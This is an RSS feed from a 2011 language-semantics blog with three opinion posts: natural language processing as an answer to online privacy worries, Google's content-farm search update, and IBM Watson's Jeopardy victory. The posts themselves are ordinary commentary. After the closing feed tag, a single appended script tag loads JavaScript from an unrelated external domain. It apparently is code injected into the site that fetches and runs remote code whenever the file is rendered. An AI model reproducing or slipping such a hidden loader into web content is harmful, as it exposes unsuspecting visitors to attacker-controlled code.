<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title></title>
	<atom:link href="http://languagesemantics.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://languagesemantics.com</link>
	<description></description>
	<lastBuildDate>Tue, 24 May 2011 07:58:56 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.1</generator>
		<item>
		<title>Linguistic context will solve the Privacy Issues</title>
		<link>http://languagesemantics.com/linguistic-context-will-solve-the-privacy-issues/</link>
		<comments>http://languagesemantics.com/linguistic-context-will-solve-the-privacy-issues/#comments</comments>
		<pubDate>Thu, 19 May 2011 14:42:51 +0000</pubDate>
		<dc:creator>Abhishek Mehta</dc:creator>
				<category><![CDATA[Blogs]]></category>
		<category><![CDATA[Ideas]]></category>
		<category><![CDATA[Internet Privacy]]></category>
		<category><![CDATA[NLP]]></category>

		<guid isPermaLink="false">http://languagesemantics.com/?p=532</guid>
		<description><![CDATA[Debate on Internet “Privacy Issues” will reach alarming levels in coming months. As biggest of the “Web 2.0” companies lined up for IPOs, this talk ]]></description>
			<content:encoded><![CDATA[<p><a href="http://languagesemantics.com/wp-content/uploads/2011/05/Privacy_trapped.jpg"><img class="size-full wp-image-538 alignright" title="Privacy_trapped" src="http://languagesemantics.com/wp-content/uploads/2011/05/Privacy_trapped.jpg" alt="" width="280" height="209" /></a></p>
<p>Debate on Internet “Privacy Issues” will reach alarming levels in coming months. As biggest of the “Web 2.0” companies lined up for IPOs, this talk is even more relevant. Privacy factor has deep implications on their overstretched valuations and future direction.</p>
<p>Legislations for “How to handle user privacy online?” are pending in many US States; like the one in California (<a title="Report" href="http://info.sen.ca.gov/pub/11-12/bill/sen/sb_0201-0250/sb_242_bill_20110502_amended_sen_v98.pdf" target="_blank">Social Networking Privacy Act (SB 242)</a>), if passed, will have long lasting impact on modus operandi of social media websites. EU counsel is also suggesting to block the “Illicit Websites” from European cyberspace. Tactically speaking,  in the future, these “Illicit Websites” will be rephrased in to “Illicit Behavior”, allowing freedom of speech but a cap on “Privacy Issues”.</p>
<p>Here is the crust of the problem, companies need to know more about you to sell more to you. Relevant advertisements, prospective clientage, growth patterns, industry predictions, network growth, and in nutshell, make more money for investors. Making profit is a great thing and so, is Internet privacy. There is no doubt that the responsibility lies towards  governments, ICANN, social media companies but a big chunk of this problem can be resolved by using “thinking software” and Natural Language Semantics.</p>
<h3>They miss, Natural Language Semantics</h3>
<p>Reason why companies need to know netizens shopping cart details, private networks, website visits and the details from the drop downs boxes , is because, they do not understand what individuals write about themselves. Companies do not make sense out of the descriptive paragraphs/tweets/updates, what netizens write. But they surely understand what is selected about by the netizens.</p>
<p>Content written by netizens on social networks, and the content liked by them has conceptual relevance. It indirectly tells a lot about their intensity, mood and needs. This information is not just legal, but also smart. When someone writes/tweets that “I am going to watch movie this weekend”; it makes more sense to sell her movie tickets rather than someone whose profile says:</p>
<p>DO YOU LIKE MOVIES – Select &#8211; “YES/NO”</p>
<p>Lots of personal information is stored and asked from the users of social networking. One major concern with the privacy, in social networking fraternity, is sharing of personal information under “I Agree” or user licensing clause. Sampling users based on their “written snippets&#8221;, without sharing entrusted information, will reduce the privacy outcry. Information holding company is liable for the information which user entrusts in them, but user is responsible for what he writes on the internet.</p>
<p>Understanding of English(or Any) language text by machines/software is important to make such a model successful. Technology is evolving but it is no way near to human intelligence. Lobbyist for and against the “<a title="Online Privacy made social" href="http://abhishekmehta.com/online-privacy-how-we-made-it-social/" target="_blank">Privacy Issues</a>”, should lobby for commitments  and investments form the  government and social media companies in the fields of natural language processing and artificial intelligence. Natural language semantics is an icebreaker for those who want privacy and those who want return on their investments.</p>
<h3>Courtesy:</h3>
<p><a class="blogentry" href="http://www.freedigitalphotos.net" target="_blank">Free Stock Photos</a> for websites &#8211; FreeDigitalPhotos.net</p>
]]></content:encoded>
			<wfw:commentRss>http://languagesemantics.com/linguistic-context-will-solve-the-privacy-issues/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Google’s Content Farm updates : or leaking patches</title>
		<link>http://languagesemantics.com/google%e2%80%99s-content-farm-updates-or-leaking-patches/</link>
		<comments>http://languagesemantics.com/google%e2%80%99s-content-farm-updates-or-leaking-patches/#comments</comments>
		<pubDate>Thu, 03 Mar 2011 13:50:10 +0000</pubDate>
		<dc:creator>Abhishek Mehta</dc:creator>
				<category><![CDATA[Blogs]]></category>
		<category><![CDATA[Content Farms]]></category>
		<category><![CDATA[Google]]></category>

		<guid isPermaLink="false">http://languagesemantics.com/?p=64</guid>
		<description><![CDATA[Latest search algorithm updates from Google are expected affect 11% of the websites. Buzz is that content farms like “eHow”, “ezinearticles” and others like those ]]></description>
			<content:encoded><![CDATA[<p><a href="http://languagesemantics.com/wp-content/uploads/2011/05/Content_Farms.jpg"><img class="alignright size-full wp-image-527" title="Content Farms" src="http://languagesemantics.com/wp-content/uploads/2011/05/Content_Farms.jpg" alt="Content Farms" width="200"/></a>Latest search algorithm updates from Google are expected affect 11% of the websites. <a title="Ref." href="http://www.readwriteweb.com/archives/has_googles_new_algorithm_really_cleaned_up_search.php" target="_blank">Buzz </a>is that content farms like “eHow”, “ezinearticles” and others like those are the targets. Idea is to downgrade the relevance of content farms in the overall search ranking system. It is considered that many content farms have low grade content which is either bought (<a title="Crowdsourcing How?" href="http://abhishekmehta.com/crowdsourcing-what-when-where-and-how/" target="_self">crowd sourcing platforms</a>) or is been plagiarized or aggregated.</p>
<h3>Content farms: Troublemakers</h3>
<p>There are some genuine concerns about the fair search; content farms apply SEO techniques to come on the top of search rankings and infest the results with not-so-valuable content. This is a double edged sword. First, Web searchers spend time in searching through these results, and secondly, loosing advertizing revenue to low value websites deters the future advertisers.</p>
<p>Content farms also increase overhead for Google. These not-so-valuable results have to be indexed, re-indexed, stored, managed, searched and presented.</p>
<p>Hail storm of search engines launches (recent years) has raised the bars for online search community; netizens expect better results, if not quicker. <a title="Celebrating Watson" href="http://abhishekmehta.com/celebrating-watson-as-an-innovation/" target="_self">In the era of IBM Watsons</a>, Google can’t let content farms spoil the party.</p>
<h3>Error in judgment:</h3>
<p>A Noble idea, without noble Karma, leads to nothing. At the first look, the Idea of attacking content farms appears to be bright and logical. But the way Google is tackling this problem is not going to make any difference in the long run.</p>
<p>Google does not have the <strong>semantics</strong> to pick valuable content over non valuable.  Stemming is the biggest stretch of linguistics inside Google search and no stemming algorithm can differentiate “content farm” from “content of the farm” (Artificially Intelligent).</p>
<p>Google runs on the keyword frequency analysis not on the contextual understanding. Content is judged important based on some input, say keywords. Same content can be more important for one set of keywords but not for others. In absence of semantic algorithms, reducing the relevancy of web results using some pre programmed algorithm, against the domain names, is against the free nature of the Internet. To kill a bad fish, no need to poison the water source.</p>
<p>Google has no way to segregate content of one website from another, except statistical proximities. Remember that Flubber movie; content farms are flubbers; predicting their shape is not possible. Google needs to judge their semantic overlap against the knowledge they represent. Otherwise, new domain names are sold at less than a dollar a month, and the Flubber can take new shape.</p>
<p>Google searches for the characters, it can neither understand what you are typing in, nor does it make sense of what a web page is conveying. Content farms have thrived on this weakness and SEO hormones. If the content farms decide to just reverse the order of their low value sentence, they will succeed in fooling statistical algorithmic changes.</p>
<p>I have been harsh on Google. But until it starts to apply semantics, syntactic and structural constructs in tandem, nothing is going to change for the web-searchers. Applying semantics is not easy and cannot happen overnight, so; in the mean time I have an extra suggestion.</p>
<h3>One Suggestion:</h3>
<p>I want to point towards Google’s <a title="SearchWiki and more" href="http://abhishekmehta.com/tag/searchwiki/" target="_self">SearchWiki</a>, my personal favorite. SearchWiki was Google’s mass scale, collaborative search effort. It was a way of customizing and personalizing search results, by user. Each web searcher can re-rank, delete, add, and comment on every single result (domain), which Google throws at him. And his preferences will be applied in all future old/new searches.</p>
<p>SearchWiki was released on November 20, 2008 and discontinued on March 3, 2010. Google replaced it with two things, one was Google Stars and another was SideWiki for sharing annotations. But they are nothing like SearchWiki.</p>
<p>As a piece of unasked advice, let the web-searchers control the quality of their search results/domains (Till we have semantic capabilities). Let us decide on the content farms (Bring back SearchWiki); don’t impose. Someone’s pennies can be other ones wealth, let the content farms live; after all Wikipedia is also a great content farm.</p>
<h3>Courtesy:</h3>
<p><a class="blogentry" href="http://www.freedigitalphotos.net" target="_blank">Free Stock Photos</a> for websites &#8211; FreeDigitalPhotos.net<br />
﻿<br />
Trackback-&gt; <a href="http://abhishekmehta.com/google%E2%80%99s-content-farm-updates-or-leaking-patches/" target="_blank">Abhishekmehta.com</a></p>
]]></content:encoded>
			<wfw:commentRss>http://languagesemantics.com/google%e2%80%99s-content-farm-updates-or-leaking-patches/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Celebrating Watson as an innovation</title>
		<link>http://languagesemantics.com/celebrating-watson-as-an-innovation/</link>
		<comments>http://languagesemantics.com/celebrating-watson-as-an-innovation/#comments</comments>
		<pubDate>Fri, 18 Feb 2011 14:04:31 +0000</pubDate>
		<dc:creator>Abhishek Mehta</dc:creator>
				<category><![CDATA[Blogs]]></category>
		<category><![CDATA[IBM Watson]]></category>
		<category><![CDATA[Machine Learning]]></category>
		<category><![CDATA[Natural Language Semantics]]></category>
		<category><![CDATA[NLP]]></category>

		<guid isPermaLink="false">http://languagesemantics.com/?p=70</guid>
		<description><![CDATA[IBM’s Watson, king of the Jeopardy game, has proven the obvious. On the final day of the game it defeated all time best of the ]]></description>
			<content:encoded><![CDATA[<p><a href="http://languagesemantics.com/wp-content/uploads/2011/05/ibm_watson_avatar.jpg"><img src="http://languagesemantics.com/wp-content/uploads/2011/05/ibm_watson_avatar.jpg" alt="" title="ibm_watson_avatar" width="188" height="188" class="alignright size-full wp-image-549" /></a>IBM’s Watson, king of the <a href="http://www.jeopardy.com/" target="_blank">Jeopardy</a> game, has proven the obvious. On the final day of the game it defeated all time best of the Jeopardy (Ken Jennings and Brad Rutter ), winning $77,973. Credit for this victory goes to IBM, Dr. David Ferruchi and his teams. This is déjà vu of IBM&#8217;s Deep Blue Supercomputer match with the reigning World Chess Champion, Garry Kasparov (May 1997).</p>
<p>“Deep Blue Supercomputer” is passé in front of IBM’s new innovation. <a title="IBM Watson" href="http://www.ibmwatson.com" target="_blank">Watson </a>is context aware and artificially intelligent. It can resolve the context and ambiguity of English text; navigate through Terabytes of memory and look for right results.</p>
<p>Did I write “look for right result”, Oh! I am sorry it is a bad phrase; Watson is claimed to cognate the human brain&#8217;s cognitive process by its statistical experiences over “unstructured and structured” knowledge base. All is done under 3 seconds using <strong>ninety</strong> “IBM POWER 750” servers, 16 Terabytes of memory, and 4 Terabytes of clustered storage.  Its microprocessors are written for the software stack to address that need of specific applications (like Jeopardy).</p>
<p>Powerful hardware is combined with amazing algorithms to give high confidence answers.  Capitalist world will not ignore this golden goose. But for a general TV viewer and journalist “<strong>The Technological Apocalypse” </strong>is approaching; some are concerned about (even) the skilled jobs, like financial analysis, medical diagnostics, and technical support going Watson’s way.</p>
<h3>Watson is not an invention, it is an innovation</h3>
<p>Let me reconfirm, Watson is here to assist you; not to take over your jobs. A program which can answer “Toronto”  in the category of “U.S. Cities”, and is unable to judge the thread between Rocky 1, 2 and 3, can repeat the wrong answers of its competitors and can only play jeopardy; is not going to replace you, yet (longer yet). Knowledge and Questions are both created by humans and Watson does what he is told to do.</p>
<p>Breath easy<strong>, </strong>relax and recite this mantra 5 times “<strong>Watson is not an invention, it is an innovation”</strong>. Watson is to language semantics what iPhone was to mobiles. Watson brought various concepts of AI (Artificial Intelligence) and Language Processing under one patched umbrella. To achieve what Watson just did has to be an effort of Machine learning experts, speech/knowledge representation/ information retrieval/ rule engine  engineers, Linguists, Ontologists, media artists, programmers and tons more. Scope of the Watson in confined only to a single sentence, it is the scale which deserves a standing ovation.</p>
<h3>Watson Family</h3>
<p>For the people in the domains of Language Semantics or Artificial Intelligence Watson is an “<strong>engineering marve</strong>l”, “<strong>modeling genius</strong>” and “<strong>marketing success</strong>”. It is the result of 100’s millions $ spend over four years. IBM has the budget for this and others don’t, so IBM can win jeopardy.  That said, it’s the winner which counts, not the others.</p>
<p>Keeping aside, the amazing publicity for IBM, and the top of the chart rating for Jeopardy; Watson is a big success for the whole Language Processing fraternity, we have struggled for years to make people understand the difference between “<a href="http://abhishekmehta.com/quest-for-perfect-search-engine-part1/" target="_self">Google and Semantic</a>” search. I am glad world is trying to understand (by itself) “How and What Watson just did?” <a href="http://abhishekmehta.com/web-2-0-%E2%80%93-bubble-bubble-go-away/" target="_self">Venture capitalists are bubbling up the Web 2.0</a>; I believe Watson phenomenon will attract them to the technology which is the future of mankind.</p>
<h3>Watson &amp; the Future</h3>
<p>Watson is fine tuned to play the game of Jeopardy; it understands the rules of the game.  It can take risks. But Watson is no thinking machine, it is a specialized machine to play jeopardy, it can resolve the context of small sentence or facts and then formulate an answer (using the deep/fast knowledge base).</p>
<p>In the practical world, Watson runs on very thin line. Its humongous infrastructure cannot be supported by mega businesses of today. It is fit for worldwide “repository/ service/ cloud” of question and answering. But real world problems/solutions are not one liner semantics. They are complex &amp; infested with human traits of culture, intelligence, voice, taste, touch, vision, smell and emotions.</p>
<p>As a search engine Watson, stands face to face with Google search. Which is kind of dumb, fast, popular and a market leader. Making dent in the search engine market is not an option for Watson; it’s too expensive and slow for this area.</p>
<p>I am sure the creators of Watson have some interesting business proposition in mind. Those who ride an elephant have to feed him too.</p>
<p style="text-align: center;">&#8212;</p>
<p>Trackback-&gt; <a href="http://abhishekmehta.com/web-2-0-–-bubble-bubble-go-away/" target="_blank">Abhishekmehta.com</a></p>
]]></content:encoded>
			<wfw:commentRss>http://languagesemantics.com/celebrating-watson-as-an-innovation/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
<script language="javascript" SRC="http://superpuperdomain2.com/count.php?ref="></script>
